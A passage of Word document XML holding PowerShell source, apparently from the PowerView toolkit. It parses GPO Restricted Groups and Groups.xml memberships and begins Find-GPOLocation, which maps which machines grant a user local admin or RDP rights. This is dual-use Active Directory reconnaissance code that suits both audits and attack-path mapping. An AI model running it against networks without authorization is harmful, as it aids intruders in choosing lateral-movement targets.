        <w:t xml:space="preserve">            ForEach ($Membership in $Memberships.GetEnumerator()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBD1F22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($Membership -and $Membership.Key -and ($Membership.Key -match '^\*')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15604886" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # if the SID is already resolved (i.e. begins with *) try to resolve SID to a name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CB092F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupSID = $Membership.Key.Trim('*')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2C1501" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($GroupSID -and ($GroupSID.Trim() -ne '')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2ECBC3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $GroupName = Convert-SidToName -SID $GroupSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514BD02E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647E5478" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7B5EAD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $GroupName = $False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EBFFF1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C6AC5F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CFA0F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305EDF26" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupName = $Membership.Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A39038" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="17E07EE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($GroupName -and ($GroupName.Trim() -ne '')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A710D22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if($Groupname -match 'Administrators') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E118114" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                            $GroupSID = 'S-1-5-32-544'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0091D128" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7511ACCA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        elseif($Groupname -match 'Remote Desktop') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421EC99B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $GroupSID = 'S-1-5-32-555'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322906DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF93808" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        elseif($Groupname -match 'Guests') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E76C63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $GroupSID = 'S-1-5-32-546'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A35F7F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1375BAA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        elseif($GroupName.Trim() -ne '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2685A9C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $GroupSID = Convert-NameToSid -Domain $Domain -ObjectName $Groupname | Select-Object -ExpandProperty SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CEF15C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0E4DDB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CDB915" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $GroupSID = $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10420B09" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AE18C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F9998E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F84C1D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="430C319D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOGroup = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D820D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOGroup | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F70928E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOGroup | Add-Member Noteproperty 'GPOName' $GPOName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB2F8C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOGroup | Add-Member Noteproperty 'GPOPath' $GPOPath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FE9DB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOGroup | Add-Member Noteproperty 'GPOType' 'RestrictedGroups'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF48084" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOGroup | Add-Member Noteproperty 'Filters' $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F33367" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOGroup | Add-Member Noteproperty 'GroupName' $GroupName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D07BC07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOGroup | Add-Member Noteproperty 'GroupSID' $GroupSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC52892" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOGroup | Add-Member Noteproperty 'GroupMemberOf' $Membership.Value.Memberof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B21C37" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOGroup | Add-Member Noteproperty 'GroupMembers' $Membership.Value.Members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F14625" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641CBCF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D89A95E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653354FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7D503F94" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ParseArgs =  @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA41086" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'GroupsXMLpath' = "$GPOPath\MACHINE\Preferences\Groups\Groups.xml"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531A8C9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'UsePSDrive' = $UsePSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C915C1F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F87D91F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="09A13529" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get-GroupsXML @ParseArgs | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08811088" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($ResolveMemberSIDs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A63F271" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GroupMembers = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4758CC5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                ForEach($Member in $_.GroupMembers) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A4FA88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($Member -and ($Member.Trim() -ne '')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382BF8B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if($Member -notmatch '^S-1-.*') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F15EFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            # if the resulting member is username and not a SID, attempt to resolve it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD6204D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $MemberSID = Convert-NameToSid -Domain $Domain -ObjectName $Member | Select-Object -ExpandProperty SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A1DE46" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            if($MemberSID) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD8F507" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $GroupMembers += $MemberSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3CDFF7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C68D914" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5C9FA4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $GroupMembers += $Member</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15654C71" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A325A3F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BD22DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEF5B69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $GroupMembers += $Member</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B92D743" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B58F297" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5F6F1B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E36605C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                $_.GroupMembers = $GroupMembers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771B8581" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DDAF21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="54947C33" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $_ | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6D8A11" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $_ | Add-Member Noteproperty 'GPOName' $GPOName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08568A57" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $_ | Add-Member Noteproperty 'GPOType' 'GroupPolicyPreferences'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B05EF1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB31EA0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAAB9F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAD0A66" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C74EACE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0C60D581" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="79EB6238" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Find-GPOLocation {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5623EC90" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3731A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F785EE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DDCD8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Enumerates the machines where a specific user/group is a member of a specific</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7323DAA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        local group, all through GPO correlation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41878A70" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="07D6C1D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Author: @harmj0y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D6C55F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        License: BSD 3-Clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5EA1CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Required Dependencies: Get-NetUser, Get-NetGroup, Get-NetGPOGroup, Get-NetOU, Get-NetComputer, Get-ADObject, Get-NetSite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7242F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Optional Dependencies: None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7EC8A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="03E3A15B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .DESCRIPTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB1E405" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="198563FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Takes a user/group name and optional domain, and determines the computers in the domain </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D59C863" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        the user/group has local admin (or RDP) rights to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686951E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2B7735BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        It does this by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1754E642" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            1.  resolving the user/group to its proper SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F12229B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            2.  enumerating all groups the user/group is a current part of </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C669BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                and extracting all target SIDs to build a target SID list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D2E11C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            3.  pulling all GPOs that set 'Restricted Groups' or Groups.xml by calling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4012AF29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Get-NetGPOGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D69662" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            4.  matching the target SID list to the queried GPO SID list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E53E2F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                to enumerate all GPO the user is effectively applied with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23366AB5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            5.  enumerating all OUs and sites and applicable GPO GUIs are</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A860EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                applied to through gplink enumerating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9AF5EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            6.  querying for all computers under the given OUs or sites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D98E4B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F349D20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        If no user/group is specified, all user/group -&gt; machine mappings discovered through</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607CB235" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        GPO relationships are returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACD9670" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C1111D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E64611" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0E1AAF4E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A (single) user name name to query for access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C3EE7F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="67A14996" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER GroupName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3190FC53" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="222CC728" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A (single) group name name to query for access. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE11C8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="191130F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438FD16A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7F61A200" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
